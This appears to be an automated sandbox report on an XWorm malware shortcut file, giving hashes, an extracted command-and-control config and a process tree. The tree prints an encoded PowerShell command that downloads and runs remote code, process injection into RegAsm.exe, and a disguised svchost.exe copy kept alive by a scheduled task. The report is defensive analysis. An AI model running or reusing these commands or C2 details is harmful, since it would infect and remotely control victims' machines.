Analysis

max time kernel
148s
max time network
152s
platform
windows10-2004_x64
resource
win10v2004-20240730-en
resource tags
arch:x64 arch:x86 image:win10v2004-20240730-en locale:en-us os:windows10-2004-x64 system
submitted
31-07-2024 07:41
Static task
static1
Behavioral task
behavioral1
Sample
nTalu.lnk
Resource
win7-20240705-en
General

Target
nTalu.lnk
Size
2KB
MD5
79b6a1c72f61bf2358eca72f4d67b4d7
SHA1
22c3540ce90d11b32b0a9c2eae94ae467af2aabf
SHA256
ee3dad6434cb64d091d15fda5900d088f46b64d0603a449d6bd46afb9705140a
SHA512
839fb585a20812324f4058cb2e354be77b243c212fcf35e1c16fb2668a266cbeb784844512e0aa15e6077cf2570e88b04bb986164f4972e1bc63a61576967d6e
Malware Config

Extracted
xworm
5.0
lisa22194141.duckdns.org:7000
2tuao2989c3EVwzo
install_file
USB.exe
Signatures

Detect Xworm Payload 1 IoCs
Processes:
resource | yara_rule
behavioral2/memory/3108-33-0x0000000000400000-0x0000000000410000-memory.dmp | family_xworm

Blocklisted process makes network request 1 IoCs
Processes:
flow | pid | process
2 | 2812 | powershell.exe

Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
description | ioc | process
Key value queried | \REGISTRY\USER\S-1-5-21-2077438316-259605770-1264560426-1000\Control Panel\International\Geo\Nation | cmd.exe

Executes dropped EXE 2 IoCs
Processes:
pid | process
928 | XovwDNpiRZKtFFANLO.exe
2172 | svchost.exe

Suspicious use of SetThreadContext 1 IoCs
Processes:
description | pid | process | target process
PID 928 set thread context of 3108 | 928 | XovwDNpiRZKtFFANLO.exe | RegAsm.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
System Location Discovery: System Language Discovery 1 TTPs 7 IoCs
Attempts to gather information about the system language of a victim in order to infer the geographical location of that host.
Processes:
description | ioc | process
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | cmd.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | cmd.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | schtasks.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | cmd.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | svchost.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | XovwDNpiRZKtFFANLO.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | RegAsm.exe

Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.

Suspicious behavior: AddClipboardFormatListener 1 IoCs
Processes:
pid | process
3108 | RegAsm.exe

Suspicious behavior: EnumeratesProcesses 3 IoCs
Processes:
pid | process
2812 | powershell.exe
2812 | powershell.exe
3108 | RegAsm.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs
Processes:
description | pid | process
Token: SeDebugPrivilege | 2812 | powershell.exe
Token: SeDebugPrivilege | 3108 | RegAsm.exe

Suspicious use of SetWindowsHookEx 1 IoCs
Processes:
pid | process
3108 | RegAsm.exe

Suspicious use of WriteProcessMemory 25 IoCs
Processes:
description | pid | process | target process
PID 4332 wrote to memory of 2812 | 4332 | cmd.exe | powershell.exe
PID 4332 wrote to memory of 2812 | 4332 | cmd.exe | powershell.exe
PID 2812 wrote to memory of 928 | 2812 | powershell.exe | XovwDNpiRZKtFFANLO.exe
PID 2812 wrote to memory of 928 | 2812 | powershell.exe | XovwDNpiRZKtFFANLO.exe
PID 2812 wrote to memory of 928 | 2812 | powershell.exe | XovwDNpiRZKtFFANLO.exe
PID 928 wrote to memory of 3108 | 928 | XovwDNpiRZKtFFANLO.exe | RegAsm.exe
PID 928 wrote to memory of 3108 | 928 | XovwDNpiRZKtFFANLO.exe | RegAsm.exe
PID 928 wrote to memory of 3108 | 928 | XovwDNpiRZKtFFANLO.exe | RegAsm.exe
PID 928 wrote to memory of 3108 | 928 | XovwDNpiRZKtFFANLO.exe | RegAsm.exe
PID 928 wrote to memory of 3108 | 928 | XovwDNpiRZKtFFANLO.exe | RegAsm.exe
PID 928 wrote to memory of 3108 | 928 | XovwDNpiRZKtFFANLO.exe | RegAsm.exe
PID 928 wrote to memory of 3108 | 928 | XovwDNpiRZKtFFANLO.exe | RegAsm.exe
PID 928 wrote to memory of 3108 | 928 | XovwDNpiRZKtFFANLO.exe | RegAsm.exe
PID 928 wrote to memory of 1216 | 928 | XovwDNpiRZKtFFANLO.exe | cmd.exe
PID 928 wrote to memory of 1216 | 928 | XovwDNpiRZKtFFANLO.exe | cmd.exe
PID 928 wrote to memory of 1216 | 928 | XovwDNpiRZKtFFANLO.exe | cmd.exe
PID 928 wrote to memory of 3212 | 928 | XovwDNpiRZKtFFANLO.exe | cmd.exe
PID 928 wrote to memory of 3212 | 928 | XovwDNpiRZKtFFANLO.exe | cmd.exe
PID 928 wrote to memory of 3212 | 928 | XovwDNpiRZKtFFANLO.exe | cmd.exe
PID 3212 wrote to memory of 2932 | 3212 | cmd.exe | schtasks.exe
PID 3212 wrote to memory of 2932 | 3212 | cmd.exe | schtasks.exe
PID 3212 wrote to memory of 2932 | 3212 | cmd.exe | schtasks.exe
PID 928 wrote to memory of 4832 | 928 | XovwDNpiRZKtFFANLO.exe | cmd.exe
PID 928 wrote to memory of 4832 | 928 | XovwDNpiRZKtFFANLO.exe | cmd.exe
PID 928 wrote to memory of 4832 | 928 | XovwDNpiRZKtFFANLO.exe | cmd.exe
Processes

C:\Windows\system32\cmd.exe
cmd /c C:\Users\Admin\AppData\Local\Temp\nTalu.lnk
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID: 4332

  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -W h -e JAB4AGMAZQAgAD0AIAAnAHgAJwA7ACAASQBlAHgAKABJAHIAbQAgAGgAdAB0AHAAcwA6AC8ALwAwAHgAMAAuAHMAdAAvAFgAZgBJAFQALgB0AHgAdAApADsAIAAkAHgAYwBlACAAPQAgACcAeAAnAA==
  - Blocklisted process makes network request
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID: 2812

    C:\Users\Admin\AppData\Roaming\XovwDNpiRZKtFFANLO.exe
    "C:\Users\Admin\AppData\Roaming\XovwDNpiRZKtFFANLO.exe"
    - Executes dropped EXE
    - Suspicious use of SetThreadContext
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID: 928

      C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
      - System Location Discovery: System Language Discovery
      - Suspicious behavior: AddClipboardFormatListener
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
      - Suspicious use of SetWindowsHookEx
      PID: 3108

      C:\Windows\SysWOW64\cmd.exe
      "cmd.exe" /C mkdir "C:\Users\Admin\AppData\Roaming\svchost"
      - System Location Discovery: System Language Discovery
      PID: 1216

      C:\Windows\SysWOW64\cmd.exe
      "cmd.exe" /C schtasks /create /sc minute /mo 1 /tn "Nafifas" /tr "'C:\Users\Admin\AppData\Roaming\svchost\svchost.exe'" /f
      - System Location Discovery: System Language Discovery
      - Suspicious use of WriteProcessMemory
      PID: 3212

        C:\Windows\SysWOW64\schtasks.exe
        schtasks /create /sc minute /mo 1 /tn "Nafifas" /tr "'C:\Users\Admin\AppData\Roaming\svchost\svchost.exe'" /f
        - System Location Discovery: System Language Discovery
        - Scheduled Task/Job: Scheduled Task
        PID: 2932

      C:\Windows\SysWOW64\cmd.exe
      "cmd.exe" /C copy "C:\Users\Admin\AppData\Roaming\XovwDNpiRZKtFFANLO.exe" "C:\Users\Admin\AppData\Roaming\svchost\svchost.exe"
      - System Location Discovery: System Language Discovery
      PID: 4832

C:\Users\Admin\AppData\Roaming\svchost\svchost.exe
C:\Users\Admin\AppData\Roaming\svchost\svchost.exe
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID: 2172
Network
MITRE ATT&CK Enterprise v15
Downloads

Filesize
60B
MD5
d17fe0a3f47be24a6453e9ef58c94641
SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Filesize
21.0MB
MD5
7d65fe5871d783fdd6c912675a2807cb
SHA1
2f2c294c04d7bdf7953562d263c68305695126ad
SHA256
c4854be24acd139e4f4658246b362e12913b57bf4ff6a85c3c295ea08ac5a33c
SHA512
167e9cd7258dcaf66d2f716e8f16a4a78b50faff08863ad4bbe4fc1d57b45b814677b60b74346c7d56edbabb0544dbfb9d27770f1bf0a6335a18cec0563d774c